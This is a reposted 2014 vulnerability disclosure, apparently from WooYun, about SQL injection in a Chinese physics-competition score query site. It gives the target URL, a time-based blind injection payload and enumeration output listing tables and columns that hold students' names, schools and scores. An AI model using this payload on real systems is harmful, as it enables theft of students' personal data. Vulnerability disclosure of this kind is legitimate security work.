记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

全国中学生物理竞赛成绩查询系统SQL注入漏洞泄露大量考生信息

2014-11-06 03:50

注入点:http://app.eduuu.com/wulijs/search.php



POST数据:yid=10&con_id=17&exam_code=123123&name=123213&submit=

yid等参数存在注入。



---

Place: POST

Parameter: yid

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: yid=10' AND SLEEP(5) AND



'djDf'='djDf&con_id=17&exam_code=123123&name=123213&submit=

---

back-end DBMS: MySQL 5.0.11

Database: wljs_score

[11 tables]

+----------------+

| Sheet1 |

| user |

| aa |

| bak |

| contest |

| contest1 |

| score |

| score1 |

| score_20120507 |

| test |

| uear |

+----------------+



---

back-end DBMS: MySQL 5.0.11

Database: wljs_score

+-------+---------+

| Table | Entries |

+-------+---------+

| score | 8143 |

+-------+---------+



---

back-end DBMS: MySQL 5.0.11

Database: wljs_score

+--------+---------+

| Table | Entries |

+--------+---------+

| score1 | 2575 |

+--------+---------+



---

back-end DBMS: MySQL 5.0.11

Database: wljs_score

Table: score

[8 columns]

+--------------+--------------+

| Column | Type |

+--------------+--------------+

| con_id | int(8) |

| exam_code | varchar(32) |

| name | varchar(50) |

| sc_id | int(8) |

| school | varchar(50) |

| score | int(3) |

| score_detail | varchar(255) |

| status | tinyint(1) |

+--------------+--------------+



数据量在1万行左右,包括考生姓名学校准考证号详细成绩等。脱库后可被非法利用。

漏洞证明:

---

back-end DBMS: MySQL 5.0.11

Database: wljs_score

+-------+---------+

| Table | Entries |

+-------+---------+

| score | 8143 |

+-------+---------+



---

back-end DBMS: MySQL 5.0.11

Database: wljs_score

+--------+---------+

| Table | Entries |

+--------+---------+

| score1 | 2575 |

+--------+---------+

未下载任何数据。

修复方案:

#1、过滤参数


知识来源: www.wooyun.org/bugs/wooyun-2014-076852

阅读:151184 | 评论:0 | 标签:注入 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“全国中学生物理竞赛成绩查询系统SQL注入漏洞泄露大量考生信息”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

黑帝公告 📢

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

↓赞助商 🙇🧎

标签云 ☁

本页关键词 💎